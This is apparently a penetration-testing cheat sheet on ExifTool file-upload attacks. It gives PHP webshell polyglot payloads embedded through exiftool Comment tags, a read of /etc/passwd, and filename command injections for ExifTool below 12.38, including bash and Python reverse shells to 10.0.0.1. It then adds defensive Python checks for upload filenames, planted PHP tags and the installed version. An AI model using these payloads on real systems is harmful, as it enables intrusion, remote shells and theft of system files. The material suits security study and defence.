# File Upload Attack on Exiftool

If a website uses ExifTool to analyze uploaded files, we might be able to exploit the vulnerabilities described below.

### Polyglot Attack

We might be able to execute remote code by turning a plain image file into a polyglot (a file that is both a valid image and valid PHP).\
First, create a blank image file as below; this step is not required if you already have an image file.

```shellscript
convert -size 32x32 xc:white test.jpg
```

Then embed the **OS command** (wrapped in PHP) into the image's metadata with **exiftool**, using the `Comment` tag.

```shellscript
exiftool -Comment="<?php system('ls'); ?>" example.png
# double quotes inside the PHP so the single-quoted shell string is not cut short
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' exploit.png
exiftool -Comment="<?php echo 'START ' . file_get_contents('/etc/passwd') . ' END'; ?>" example.jpg -o polyglot.php
```

### Command Injection (ExifTool < 12.38)

On ExifTool versions lower than **12.38**, we can inject an **OS command** through the filename of the uploaded file; note the trailing `|` in each example, which is what makes ExifTool treat the name as a command to run.

```shellscript
# Ping
filename="touch test; ping -c 1 10.0.0.1 |"

# Reverse shell
filename="touch test; bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 |"
filename="touch test; bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\" |"
filename="touch test; python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.0.0.1\", 1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")' |"
```
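As an added, defensive counterpart to both sections (not part of the original page), the following Python upload-handler checks reject the filename injection pattern, refuse non-image names such as `polyglot.php`, flag a PHP open tag planted in an image's metadata, and verify that the installed ExifTool is at least 12.38. The function names, the allowed-extension list and the sample bytes are assumptions of this example.

```python
import re
import subprocess

# First ExifTool release without the filename injection, as stated on this page.
PATCHED_EXIFTOOL_VERSION = 12.38

# Assumed allow-list: only plain image extensions are stored; "polyglot.php" is refused.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}

# Shell-relevant characters. The trailing "|" is what the pre-12.38 filename
# injection relies on; the rest are rejected as a matter of principle.
FORBIDDEN_FILENAME_CHARS = re.compile(r"[|;&$`<>'\"\n\r\x00]")

# A PHP open tag has no business inside an image, in a Comment tag or anywhere else.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def safe_filename(name: str) -> str:
    """Return a safe basename for an uploaded file, or raise ValueError."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]  # drop any directory parts
    if not base or base.startswith("."):
        raise ValueError(f"rejected empty or hidden filename: {name!r}")
    if FORBIDDEN_FILENAME_CHARS.search(base):
        raise ValueError(f"rejected filename with shell characters: {name!r}")
    ext = base[base.rfind("."):].lower() if "." in base else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"rejected disallowed extension: {name!r}")
    return base


def contains_php_tag(data: bytes) -> bool:
    """True if the raw upload bytes carry a PHP open tag (e.g. planted via -Comment)."""
    return PHP_OPEN_TAG.search(data) is not None


def exiftool_is_patched(version: str) -> bool:
    """ExifTool versions are plain decimals such as '12.37'; compare against 12.38."""
    return float(version.strip()) >= PATCHED_EXIFTOOL_VERSION


def installed_exiftool_is_patched() -> bool:
    """Ask the local exiftool binary for its version (no shell involved); False if absent."""
    try:
        out = subprocess.run(["exiftool", "-ver"], capture_output=True, text=True, check=True)
    except (OSError, subprocess.CalledProcessError):
        return False
    return exiftool_is_patched(out.stdout)


if __name__ == "__main__":
    # Constructed sample: PNG signature followed by a planted PHP comment (not a real image).
    planted = b"\x89PNG\r\n\x1a\n" + b"<?php system('ls'); ?>"
    print(contains_php_tag(planted))                 # True
    print(safe_filename("../uploads/holiday.JPG"))   # holiday.JPG
    for bad in ("touch test; ping -c 1 10.0.0.1 |", "polyglot.php"):
        try:
            safe_filename(bad)
        except ValueError as exc:
            print(exc)
```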
